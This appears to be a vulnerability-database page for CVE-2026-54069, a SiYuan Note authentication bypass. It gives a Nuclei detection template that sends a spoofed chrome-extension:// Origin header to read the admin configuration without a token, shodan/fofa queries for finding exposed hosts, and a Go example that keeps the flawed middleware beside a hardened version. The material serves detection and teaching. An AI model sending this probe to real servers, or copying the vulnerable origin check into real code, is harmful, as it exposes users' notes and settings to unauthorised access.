| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2026-54069 | 24 Jun 2026 21:17 | – | attackerkb |
| CVE-2026-54069 | 17 Jun 2026 04:18 | – | circl |
| CVE-2026-54069 | 24 Jun 2026 21:17 | – | cve |
| CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist | 24 Jun 2026 21:17 | – | cvelist |
| EUVD-2026-39125 | 24 Jun 2026 21:17 | – | euvd |
| CVE-2026-54069 | 24 Jun 2026 22:16 | – | nvd |
| PT-2026-50413 | 17 Jun 2026 00:00 | – | ptsecurity |
| CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist | 24 Jun 2026 21:17 | – | vulnrichment |
```yaml
id: CVE-2026-54069

info:
  name: SiYuan Note <= 3.6.5 - Authentication Bypass
  author: 0x_Akoko
  severity: high
  description: |
    SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
  impact: |
    Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.
  remediation: |
    Update to SiYuan Note v3.7.0 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-54069
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-54069
    epss-score: 0.00607
    epss-percentile: 0.44641
    cwe-id: CWE-346
  metadata:
    verified: false
    max-request: 1
    vendor: siyuan-note
    product: siyuan
    shodan-query: title:"SiYuan"
    fofa-query: title="SiYuan" || body="siyuan"
  tags: cve,cve2026,siyuan,auth-bypass,unauth

http:
  - raw:
      - |
        POST /api/system/getConf HTTP/1.1
        Host: {{Hostname}}
        Origin: chrome-extension://auth-test
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"code\":0")'
          - 'contains_all(body, "\"conf\"", "\"system\"", "\"kernelVersion\"")'
        condition: and
# digest: 4a0a0047304502201ac92fa95ce0feaf25c24ab13bb431f54d78aa395e793e38998e1d0d1b94f245022100887d09d50ec075f07f12cf729123057033dca6c436adeedf2867696dee0ed452:922c64590222798bb761d5b6d8e72950
```
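The template above only sends the probe; the bug it relies on is a middleware that lets a request header decide privilege. The following Go example is added here to show that pattern next to a hardened form. It is illustrative code, not SiYuan's source: the role names echo the advisory's wording, the `Authorization: Token <value>` scheme, the helper names and the extension ID are all assumptions made for the example. `vulnerableCheckAuth` hands out the administrator role to any `Origin` beginning with `chrome-extension://` before looking at a token, which is exactly what the probe (`Origin: chrome-extension://auth-test`, no token) exploits. `hardenedCheckAuth` treats `Origin` as something that can only narrow access, accepts only an exact, configured extension ID, and still requires the token.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net/http"
	"strings"
)

// Role is the privilege level granted to an API request. Names follow the
// advisory's wording; this is an illustrative model, not SiYuan's code.
type Role int

const (
	RoleAnonymous Role = iota
	RoleAdministrator
)

func (r Role) String() string {
	if r == RoleAdministrator {
		return "administrator"
	}
	return "anonymous"
}

// roleFromToken is the only place privilege should come from: a request is an
// administrator if and only if it presents the configured API token.
// The "Authorization: Token <value>" scheme is an assumption for the example.
func roleFromToken(req *http.Request, apiToken string) Role {
	auth := req.Header.Get("Authorization")
	presented := strings.TrimPrefix(auth, "Token ")
	hadScheme := auth != presented // TrimPrefix changed nothing => wrong scheme or no header
	if apiToken != "" && hadScheme &&
		subtle.ConstantTimeCompare([]byte(presented), []byte(apiToken)) == 1 {
		return RoleAdministrator
	}
	return RoleAnonymous
}

// vulnerableCheckAuth reproduces the bypass pattern the advisory describes:
// any Origin starting with "chrome-extension://" is treated as the trusted
// browser extension and receives RoleAdministrator before the token is ever
// inspected. Origin is attacker-controlled for every non-browser client
// (curl, nuclei, a script), so the check grants nothing but a free pass.
func vulnerableCheckAuth(req *http.Request, apiToken string) Role {
	if strings.HasPrefix(req.Header.Get("Origin"), "chrome-extension://") {
		return RoleAdministrator
	}
	return roleFromToken(req, apiToken)
}

// hardenedCheckAuth lets Origin narrow access but never widen it: a
// chrome-extension:// Origin is accepted only for an exact, configured
// extension ID (so CORS can be granted to that extension), and even then the
// request must still carry a valid token to obtain any privilege.
func hardenedCheckAuth(req *http.Request, apiToken string, allowedExtensionIDs map[string]bool) Role {
	origin := req.Header.Get("Origin")
	if strings.HasPrefix(origin, "chrome-extension://") {
		id := strings.TrimPrefix(origin, "chrome-extension://")
		if !allowedExtensionIDs[id] {
			return RoleAnonymous // unknown extension: reject outright
		}
	}
	return roleFromToken(req, apiToken)
}

// newProbe builds the request the detection template sends; origin and token
// may be empty to omit the corresponding header.
func newProbe(origin, token string) *http.Request {
	req, _ := http.NewRequest(http.MethodPost, "/api/system/getConf", strings.NewReader("{}"))
	req.Header.Set("Content-Type", "application/json")
	if origin != "" {
		req.Header.Set("Origin", origin)
	}
	if token != "" {
		req.Header.Set("Authorization", "Token "+token)
	}
	return req
}

func main() {
	const apiToken = "s3cr3t-example-token"                                    // constructed value
	allowed := map[string]bool{"abcdefghijklmnopabcdefghijklmnop": true}      // constructed extension ID
	spoofed := newProbe("chrome-extension://auth-test", "")                   // the template's probe
	fmt.Println("vulnerable middleware grants:", vulnerableCheckAuth(spoofed, apiToken))
	fmt.Println("hardened middleware grants:  ", hardenedCheckAuth(spoofed, apiToken, allowed))
}
```

Running it prints `administrator` for the vulnerable path and `anonymous` for the hardened one on the same spoofed probe. The design point is that an exact-ID allowlist alone is not the fix: an attacker can send any `Origin` value, so the allowlist only decides whether CORS is offered, and the token check must run regardless.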